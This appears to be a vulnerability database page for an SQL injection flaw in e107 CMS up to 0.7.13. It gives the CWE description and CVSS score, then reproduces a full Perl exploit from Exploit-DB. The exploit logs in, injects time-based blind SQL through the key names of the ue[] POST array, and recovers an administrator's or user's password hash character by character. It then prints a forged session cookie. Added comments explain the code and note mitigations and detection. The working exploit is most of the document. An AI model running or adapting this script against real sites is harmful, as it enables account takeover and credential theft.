Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-89 |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.5 |
|
AV:N/AC:L/Au:S/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 6791
Publication date : 2008-10-18 22h00 +00:00
Author : girex
EDB Verified : Yes
# Author: __GiReX__
# Homepage: http://girex.altervista.org
# Date: 19/10/2008
# CMS: e107
# URL: http://e107.org/
# Note: Works regardless of php.ini settings (magic_quotes, register_globals..)
# Attention: This exploit was written for educational purposes.
# Use it at your own risk. The author will not be responsible for any damage.
# Description: e107 is a content management system written in PHP
# and using the popular open source MySQL database system for content storage.
# It's completely free, totally customisable and in constant development.
# Bug description:
# e107 has a vulnerability in usersettings.php (lines 363-395): a POST array ($_POST['ue'])
# goes into an update query; it cleans the values of this array but not the key names...
# File: usersettings.php (line 363-395)
if($_POST['ue'])
...
foreach($_POST['ue'] as $key => $val)
$err = $ue->user_extended_validate_entry($val,$extList[$key]);
if(!$err)
$val = $tp->toDB($val); <== Cleans values
$ue_fields .= $key."='".$val."'"; <== Here our $_POST['ue'] keys and values
}
}
...
# Lines: 496-500
if($ue_fields)
{
// ***** Next line creates a record which presumably should be there anyway, so could generate an error
$sql->db_Select_gen("INSERT INTO #user_extended (user_extended_id, user_hidden_fields) values ('".intval($inp)."', '')");
$sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'"); <== Here vulnerable query
}
# As you can see, the return value of the update query isn't checked, so we have to use a blind (time-based) benchmark() method
#!/usr/bin/perl
# e107 <= 0.7.13 Blind SQL Injection Exploit
# Admin/User's Password Retrieve Exploit
# Works regardless of php.ini settings
# Coded by __GiReX__
use POSIX;
use LWP::UserAgent;
use HTTP::Cookies;
use Digest::MD5 qw(md5 md5_hex md5_base64);
# --- Main flow.  There is no `use strict`/`use warnings`, so $ndelay, $bdelay,
# $rv, $char, $rand and $cookie_prefix below are undeclared package globals;
# $cookie_prefix is assigned as a side effect inside try_login(). ---
if(@ARGV < 4)
{
banner();
print "[+] You need an user account to run this exploit\n\n";
print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass> <victim_id>\n";
print "[+] Example: perl $0 localhost /e107/ test password 1\n";
exit;
}
# Base URL = host + path; "http://" is prepended only when the host argument
# does not already start with it.  The path is used verbatim, so it has to end
# in "/" for the 'news.php' / 'usersettings.php' suffixes appended later.
my $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0].$ARGV[1]: 'http://' . $ARGV[0].$ARGV[1];
# Account credentials plus the user_id to query; falls back to 1 when the
# fifth argument is missing or false.
my ($user, $pass, $id) = ($ARGV[2], $ARGV[3], ($ARGV[4]) ? $ARGV[4] : 1);
# Indirect-object syntax (`new Class`); `LWP::UserAgent->new` is the
# conventional form.  The cookie jar retains the session cookie set at login.
my $lwp = new LWP::UserAgent or die;
my $cookie_jar = new HTTP::Cookies or die;
$lwp->cookie_jar( $cookie_jar );
# ASCII codes for '0'..'9' and 'a'..'f': the alphabet of a lowercase hex digest.
my @cset = (48..57, 97..102);
# Iteration count handed to MySQL BENCHMARK() in check_bench()/check_char();
# it decides how long a "true" probe stalls the server.
my $benchmark = 1000000;
# Table prefix interpolated into the probe query in check_char().
my $prefix = "e107";
# Accumulates the recovered hex characters.  It starts as "" (defined), so the
# `not defined $hash` test further down can never be true.
my $hash = "";
banner();
try_login($user, $pass) or die "[-] Unable to login with $user and $pass\n";
syswrite(STDOUT, "[+] Logged in with your account..\n".
"[+] Checking database delay, please wait..\n\n" );
# Calibration: round-trip time for an always-false vs. an always-true
# condition.  Both are whole seconds because time() has one-second resolution.
$ndelay = check_bench("1=0");
print STDOUT "[+] Normal delay: $ndelay\n";
$bdelay = check_bench("1=1");
print STDOUT "[+] Benchmark delay: $bdelay\n\n";
# Timing inference is only usable when the two baselines are clearly apart.
if($bdelay - $ndelay < 4)
{
print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n";
exit ();
}
# One outer iteration per position of the 32-character value (length checked
# below); the inner loop tries every hex digit for that position.
for(my $j = 1; $j <= 32; $j++)
{
# $char is a global loop variable (no `my`).
foreach $char(@cset)
{
info(chr($char), $hash, "password");
# time() in list context still yields a single value, so $post_time is
# undef here and only becomes meaningful after the reassignment below.
my ($pre_time, $post_time) = time();
$rv = check_char($char, $j, "user_password");
$post_time = time();
# A hit is an HTTP success whose round trip exceeded the normal delay by
# more than 3 s; the first matching digit wins and the inner loop stops.
if($rv and ($post_time - $pre_time) > ($ndelay + 3))
{
$hash .= chr($char);
last;
}
}
# No digit matched at position $j: the timing model has broken down, so stop
# instead of continuing with a gap in the result.
last if $j != length($hash);
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
exit;
}
else
{
# $cookie_prefix was captured from the Set-Cookie header inside try_login().
print STDOUT "\n\n[+] You can try to login with this cookie:\n";
print STDOUT "[+] Cookie: ${cookie_prefix}cookie=${id}.". md5_hex($hash)."\n";
}
# Log in with the supplied account so that later POSTs carry a session cookie.
# Args: ($user, $pass).  Returns 1 when a Set-Cookie header was seen, undef
# when the status looked acceptable but no cookie was found; dies otherwise.
# Side effect: assigns the package global $cookie_prefix, read by the main flow.
sub try_login
{
my ($user, $pass) = @_;
my $res = $lwp->post( $target.'news.php' ,
[ 'username' => $user,
'userpass' => $pass,
'userlogin' => 'Login',
'autologin' => '1' ] );
# NOTE(review): the alternation is not grouped, so this matches "302" at the
# start OR "200"/"301" anywhere in the status line.  `/^(?:302|200|301)/` is
# presumably what was meant; is_success already covers the 2xx case.
if($res->status_line =~ /^302|200|301/ or $res->is_success)
{
# Greedy capture without /s: everything from "Set-Cookie: " to the last
# "cookie" on that header line.  Assumes the site sets a single cookie
# named "<prefix>cookie"; a cookie value containing "cookie" would skew it.
if($res->as_string =~ /Set-Cookie: (.+)cookie/)
{
$cookie_prefix = $1;
return 1;
}
# `return undef` yields a one-element list in list context; the caller uses
# boolean context (`or die`), so it is harmless here.
return undef;
}
die ("[-] Unable to request ${target}news.php ".$res->status_line."\n");
}
# Progress indicator: rewrite the current terminal line with the text
# recovered so far followed by the candidate character under test.
# Args: $ch (candidate character), $so_far (recovered text, may be undef and
# is then shown as empty), $label (name of what is being recovered).
# Turns on autoflush for the selected handle so the "\r" refresh is visible
# immediately.
sub info
{
    my ($ch, $so_far, $label) = @_;
    my $shown = defined $so_far ? $so_far : '';
    print STDOUT "[+] Victim ${label}: ${shown}${ch}\r";
    $| = 1;
}
# Measure the server's response time, in whole seconds, for a request whose
# BENCHMARK() call runs only when the SQL condition $true holds.
# Arg: $true — an SQL boolean expression ("1=0" / "1=1" from the main flow).
# Returns: ceil of the mean of three timed requests (integer seconds).
sub check_bench
{
my $true = shift;
my $delay = 0;
# The expression travels as the *name* of the ue[] form field.  Per the
# usersettings.php excerpt above, field names are concatenated into
# $ue_fields unescaped while only values go through toDB(), and the trailing
# "#" comments out the remainder of the UPDATE.
# Mitigation (server side): reject any ue[] key that is not a known extended
# field name before the query is assembled, and bind values as parameters.
my $sql = "user_hidden_fields=99 AND CASE WHEN(${true}) THEN benchmark(${benchmark}, MD5(1)) END#";
for(1..3)
{
# time() has one-second resolution, so every sample is an integer.
my ($pre_time, $post_time) = time();
# $res is assigned but never inspected; a failed request still counts.
my $res = $lwp->post( $target.'usersettings.php',
[ 'email' => 'damn@email.com',
'updatesettings' => 'Save Settings',
"ue[${sql}]" => 'damn' ]);
$post_time = time();
$delay += int($post_time - $pre_time);
}
return ceil($delay / 3);
}
# One blind probe: asks whether character $n of column $field for user_id $id
# has ASCII code $char, stalling with BENCHMARK() when it does.
# Args: $char (ASCII code), $n (1-based position), $field (column name).
# Returns: $res->is_success only.  The caller infers the answer from elapsed
# time, because usersettings.php never reports the UPDATE's outcome (see the
# note above the script).
# Detection: each probe is a POST to usersettings.php whose ue[] field *name*
# carries SQL keywords (CASE WHEN, SUBSTRING, benchmark); request-log or WAF
# rules that inspect only parameter values will not see it.
sub check_char
{
my ($char, $n, $field) = @_ ;
# $rand is an undeclared global.  It only changes the literal on the left of
# the AND — presumably so successive probes are not byte-identical — and plays
# no part in the comparison.
$rand = int($char + $n);
# $prefix, $benchmark, $id, $target and $lwp are the file-level lexicals set in
# the main flow.
my $sql = "user_hidden_fields=${rand} AND CASE WHEN(SELECT ASCII(SUBSTRING(${field},${n},1)) ".
"FROM ${prefix}_user WHERE user_id=${id})=${char} THEN benchmark(${benchmark}, MD5(1)) END#";
my $res = $lwp->post( $target.'usersettings.php',
[ 'email' => 'damn@email.com',
'updatesettings' => 'Save Settings',
"ue[${sql}]" => 'damn' ]);
return $res->is_success;
}
# Print the tool's title block to the currently selected output handle
# (STDOUT by default): a blank line, three tagged lines, a blank line.
sub banner
{
    my @lines = (
        '',
        "[+] e107 <= 0.7.13 Blind SQL Injection",
        "[+] Admin/User's Password Retrieve Exploit",
        "[+] Coded by __GiReX__",
        '',
    );
    print join("\n", @lines), "\n";
}
# milw0rm.com [2008-10-19]
Products Mentioned
Configuration 0
E107>>E107 >> Version To (including) 0.7.13
E107>>E107 >> Version 0.7
E107>>E107 >> Version 0.7.1
E107>>E107 >> Version 0.7.2
E107>>E107 >> Version 0.7.3
E107>>E107 >> Version 0.7.4
E107>>E107 >> Version 0.7.5
E107>>E107 >> Version 0.7.6
E107>>E107 >> Version 0.7.7
E107>>E107 >> Version 0.7.8
E107>>E107 >> Version 0.7.9
E107>>E107 >> Version 0.7.10
E107>>E107 >> Version 0.7.11
E107>>E107 >> Version 0.547_beta
E107>>E107 >> Version 0.548_beta
E107>>E107 >> Version 0.549_beta
E107>>E107 >> Version 0.551_beta
E107>>E107 >> Version 0.552_beta
E107>>E107 >> Version 0.553_beta
E107>>E107 >> Version 0.554_beta
E107>>E107 >> Version 0.555_beta
E107>>E107 >> Version 0.600
E107>>E107 >> Version 0.601
E107>>E107 >> Version 0.602
E107>>E107 >> Version 0.603
E107>>E107 >> Version 0.604
E107>>E107 >> Version 0.605
E107>>E107 >> Version 0.606
E107>>E107 >> Version 0.607
E107>>E107 >> Version 0.608
E107>>E107 >> Version 0.609
E107>>E107 >> Version 0.610
E107>>E107 >> Version 0.611
E107>>E107 >> Version 0.612
E107>>E107 >> Version 0.613
E107>>E107 >> Version 0.614
E107>>E107 >> Version 0.615
E107>>E107 >> Version 0.615a
E107>>E107 >> Version 0.616
E107>>E107 >> Version 0.617
E107>>E107 >> Version 0.6171
E107>>E107 >> Version 0.6172
E107>>E107 >> Version 0.6173
E107>>E107 >> Version 0.6174
E107>>E107 >> Version 0.6175
E107>>E107 >> Version 5.1
E107>>E107 >> Version 5.3_beta
E107>>E107 >> Version 5.3_beta2
E107>>E107 >> Version 5.04
E107>>E107 >> Version 5.4_beta1
E107>>E107 >> Version 5.4_beta3
E107>>E107 >> Version 5.4_beta4
E107>>E107 >> Version 5.4_beta5
E107>>E107 >> Version 5.4_beta6
E107>>E107 >> Version 5.05
E107>>E107 >> Version 5.21
References